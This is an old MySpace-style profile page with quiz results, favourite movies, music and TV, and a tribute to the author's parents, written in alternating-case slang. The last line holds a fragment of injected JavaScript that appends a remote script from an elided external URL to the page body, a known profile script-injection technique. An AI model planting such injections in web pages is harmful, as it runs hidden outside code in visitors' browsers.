MySpace Glitter Graphics*~DaNcInG, KiCkIn It wiT My MaN AnD HomEgiRlZ!gOiNg TOo ThA MoViEs. JuSt ChiLlin!...
You Are Designer Panties
You demand the best, from head to toe.
And your panties have to be pure couture, for your own luxury.
Men feel like you're a worthy challenge, though you can be difficult to catch.
You exude a polished, sexy vibe that tends to attract confident men.
What Kind of Panties Are You?
gurl iz a freak...u got all tha men on lock down iz a a PIMPETTE!! holla bakk
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What Kinda Kiss R U?
Romantic Kiss
Lying in bed after making love and just doing whatever.
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What Kind of Cute Are You?
Kitten Cute
You are KITTEN CUTE! You are as cute as it gets. You are adorable, snuggly, playful and small. Everyone loves you, and if they don't they're probably mean.
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*~Id LiKe 2 MEet*~ JeT Li BeCaUsE I LoVe HiS MoViEs And He CaN KiCk SoMe MaJor ASs! JaCkIe ChAn! CuZ He KiCks AloT Of aSs TOo. YoU KnOw I GoTtA KEep It GaNgStA 4 ThA AzNS!...
*~AaIlYaH FrAnKiE J Mr SaNcHo,MaRquEs HoUsTon,Mr CriMinAL,ImX,PrETty RiCkY OmArIoN MiLa J Mc MaGiC YoU KnOw ALl BoUt ThA LoVe SoNgS*~...
*~Jet Li*~JaCkIe ChAn MoViEs*~ThE GruDgE* TrOy ,UMmm MoStLy ScArY MoViEs! MeNaCe 2 SoCiEty, SoUth CeNtRaL. BoYs In Da HOod!...
MaKiNg ThA BaNd, AmEriCan IdOl,AmEriKas FuNniEsT HomE ViDeoEs! 106th And PaRk.MaUrY...
*~My DaD AnD MoM*~My DaD BeCaUse He alwAyS SuPpoRtS Me BuT YeLlS At Me WhEn I NEed It.He MaDe Me StrOng MiNDed ANd MaDe Me UnDerStAnd HoW MuCh LiFe Is ImPoRtAnT.I ReSpEct That He Is In IrAq WoRkIng 4 Me And My FaMily.NeXt My Mom BeCaUse ShE Is vAlWaYs ThErE WhEn I NEed Her.AnD She UnDerStAnDs Me!'..var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /